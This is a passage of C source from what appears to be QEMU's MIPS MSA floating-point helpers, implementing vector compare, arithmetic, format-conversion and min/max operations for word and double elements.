*env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UEQ(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UEQ(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_lt(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], lt, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], lt, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_ult(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_ULT(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_ULT(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_le(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], le, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], le, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_ule(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_ULE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_ULE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_or(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_OR(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_OR(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_une(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_ne(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_NE(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_NE(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } void helper_msa_fcaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_af(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_un(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fceq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_eq(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ueq(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fclt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_lt(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ult(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_le(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ule(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fsaf_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_af(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsun_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_un(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fseq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_eq(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsueq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ueq(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fslt_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_lt(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsult_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ult(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsle_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_le(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsule_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ule(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fcor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_or(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_une(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fcne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ne(env, pwd, pws, pwt, df, 1, GETPC()); } void helper_msa_fsor_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_or(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsune_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_une(env, pwd, pws, pwt, df, 0, GETPC()); } void helper_msa_fsne_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); compare_ne(env, pwd, pws, pwt, df, 0, GETPC()); } #define float16_is_zero(ARG) 0 #define float16_is_zero_or_denormal(ARG) 0 #define IS_DENORMAL(ARG, BITS) \ (!float ## BITS ## _is_zero(ARG) \ && float ## BITS ## _is_zero_or_denormal(ARG)) #define MSA_FLOAT_BINOP(DEST, OP, ARG1, ARG2, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG1, ARG2, status); \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_fadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], add, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], add, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], sub, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], sub, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmul_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], mul, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], mul, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fdiv_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], div, pws->w[i], pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], div, pws->d[i], pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_MULADD(DEST, ARG1, ARG2, ARG3, NEGATE, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _muladd(ARG2, ARG3, ARG1, NEGATE, status); \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_fmadd_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], pws->w[i], pwt->w[i], 0, 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], pws->d[i], pwt->d[i], 0, 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmsub_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_MULADD(pwx->w[i], pwd->w[i], pws->w[i], pwt->w[i], float_muladd_negate_product, 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_MULADD(pwx->d[i], pwd->d[i], pws->d[i], pwt->d[i], float_muladd_negate_product, 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fexp2_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_BINOP(pwx->w[i], scalbn, pws->w[i], pwt->w[i] > 0x200 ? 0x200 : pwt->w[i] < -0x200 ? -0x200 : pwt->w[i], 32); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_BINOP(pwx->d[i], scalbn, pws->d[i], pwt->d[i] > 0x1000 ? 0x1000 : pwt->d[i] < -0x1000 ? -0x1000 : pwt->d[i], 64); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_UNOP(DEST, OP, ARG, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG, status); \ c = update_msacsr(env, 0, IS_DENORMAL(DEST, BITS)); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_fexdo_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { /* * Half precision floats come in two formats: standard * IEEE and "ARM" format. The latter gains extra exponent * range by omitting the NaN/Inf encodings. */ flag ieee = 1; MSA_FLOAT_BINOP(Lh(pwx, i), from_float32, pws->w[i], ieee, 16); MSA_FLOAT_BINOP(Rh(pwx, i), from_float32, pwt->w[i], ieee, 16); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP(Lw(pwx, i), from_float64, pws->d[i], 32); MSA_FLOAT_UNOP(Rw(pwx, i), from_float64, pwt->d[i], 32); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define MSA_FLOAT_UNOP_XD(DEST, OP, ARG, BITS, XBITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG, status); \ c = update_msacsr(env, CLEAR_FS_UNDERFLOW, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## XBITS(status) >> 6) << 6) | c; \ } \ } while (0) void helper_msa_ftq_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_UNOP_XD(Lh(pwx, i), to_q16, pws->w[i], 32, 16); MSA_FLOAT_UNOP_XD(Rh(pwx, i), to_q16, pwt->w[i], 32, 16); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_UNOP_XD(Lw(pwx, i), to_q32, pws->d[i], 64, 32); MSA_FLOAT_UNOP_XD(Rw(pwx, i), to_q32, pwt->d[i], 64, 32); } break; default: assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } #define NUMBER_QNAN_PAIR(ARG1, ARG2, BITS, STATUS) \ !float ## BITS ## _is_any_nan(ARG1) \ && float ## BITS ## _is_quiet_nan(ARG2, STATUS) #define MSA_FLOAT_MAXOP(DEST, OP, ARG1, ARG2, BITS) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ \ set_float_exception_flags(0, status); \ DEST = float ## BITS ## _ ## OP(ARG1, ARG2, status); \ c = update_msacsr(env, 0, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) #define FMAXMIN_A(F, G, X, _S, _T, BITS, STATUS) \ do { \ uint## BITS ##_t S = _S, T = _T; \ uint## BITS ##_t as, at, xs, xt, xd; \ if (NUMBER_QNAN_PAIR(S, T, BITS, STATUS)) { \ T = S; \ } \ else if (NUMBER_QNAN_PAIR(T, S, BITS, STATUS)) { \ S = T; \ } \ as = float## BITS ##_abs(S); \ at = float## BITS ##_abs(T); \ MSA_FLOAT_MAXOP(xs, F, S, T, BITS); \ MSA_FLOAT_MAXOP(xt, G, S, T, BITS); \ MSA_FLOAT_MAXOP(xd, F, as, at, BITS); \ X = (as == at || xd == float## BITS ##_abs(xs)) ? xs : xt; \ } while (0) void helper_msa_fmin_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { if (NUMBER_QNAN_PAIR(pws->w[0], pwt->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], min, pws->w[0], pws->w[0], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[0], pws->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], min, pwt->w[0], pwt->w[0], 32); } else { MSA_FLOAT_MAXOP(pwx->w[0], min, pws->w[0], pwt->w[0], 32); } if (NUMBER_QNAN_PAIR(pws->w[1], pwt->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], min, pws->w[1], pws->w[1], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[1], pws->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], min, pwt->w[1], pwt->w[1], 32); } else { MSA_FLOAT_MAXOP(pwx->w[1], min, pws->w[1], pwt->w[1], 32); } if (NUMBER_QNAN_PAIR(pws->w[2], pwt->w[2], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[2], min, pws->w[2], pws->w[2], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[2], pws->w[2], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[2], min, pwt->w[2], pwt->w[2], 32); } else { MSA_FLOAT_MAXOP(pwx->w[2], min, pws->w[2], pwt->w[2], 32); } if (NUMBER_QNAN_PAIR(pws->w[3], pwt->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], min, pws->w[3], pws->w[3], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[3], pws->w[3], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[3], min, pwt->w[3], pwt->w[3], 32); } else { MSA_FLOAT_MAXOP(pwx->w[3], min, pws->w[3], pwt->w[3], 32); } } else if (df == DF_DOUBLE) { if (NUMBER_QNAN_PAIR(pws->d[0], pwt->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], min, pws->d[0], pws->d[0], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[0], pws->d[0], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[0], min, pwt->d[0], pwt->d[0], 64); } else { MSA_FLOAT_MAXOP(pwx->d[0], min, pws->d[0], pwt->d[0], 64); } if (NUMBER_QNAN_PAIR(pws->d[1], pwt->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], min, pws->d[1], pws->d[1], 64); } else if (NUMBER_QNAN_PAIR(pwt->d[1], pws->d[1], 64, status)) { MSA_FLOAT_MAXOP(pwx->d[1], min, pwt->d[1], pwt->d[1], 64); } else { MSA_FLOAT_MAXOP(pwx->d[1], min, pws->d[1], pwt->d[1], 64); } } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmin_a_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { FMAXMIN_A(min, max, pwx->w[0], pws->w[0], pwt->w[0], 32, status); FMAXMIN_A(min, max, pwx->w[1], pws->w[1], pwt->w[1], 32, status); FMAXMIN_A(min, max, pwx->w[2], pws->w[2], pwt->w[2], 32, status); FMAXMIN_A(min, max, pwx->w[3], pws->w[3], pwt->w[3], 32, status); } else if (df == DF_DOUBLE) { FMAXMIN_A(min, max, pwx->d[0], pws->d[0], pwt->d[0], 64, status); FMAXMIN_A(min, max, pwx->d[1], pws->d[1], pwt->d[1], 64, status); } else { assert(0); } check_msacsr_cause(env, GETPC()); msa_move_v(pwd, pwx); } void helper_msa_fmax_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t wt) { float_status *status = &env->active_tc.msa_fp_status; wr_t wx, *pwx = &wx; wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); wr_t *pwt = &(env->active_fpu.fpr[wt].wr); clear_msacsr_cause(env); if (df == DF_WORD) { if (NUMBER_QNAN_PAIR(pws->w[0], pwt->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], max, pws->w[0], pws->w[0], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[0], pws->w[0], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[0], max, pwt->w[0], pwt->w[0], 32); } else { MSA_FLOAT_MAXOP(pwx->w[0], max, pws->w[0], pwt->w[0], 32); } if (NUMBER_QNAN_PAIR(pws->w[1], pwt->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], max, pws->w[1], pws->w[1], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[1], pws->w[1], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[1], max, pwt->w[1], pwt->w[1], 32); } else { MSA_FLOAT_MAXOP(pwx->w[1], max, pws->w[1], pwt->w[1], 32); } if (NUMBER_QNAN_PAIR(pws->w[2], pwt->w[2], 32, status)) { MSA_FLOAT_MAXOP(pwx->w[2], max, pws->w[2], pws->w[2], 32); } else if (NUMBER_QNAN_PAIR(pwt->w[2], pws->w[2], 32, status)) { 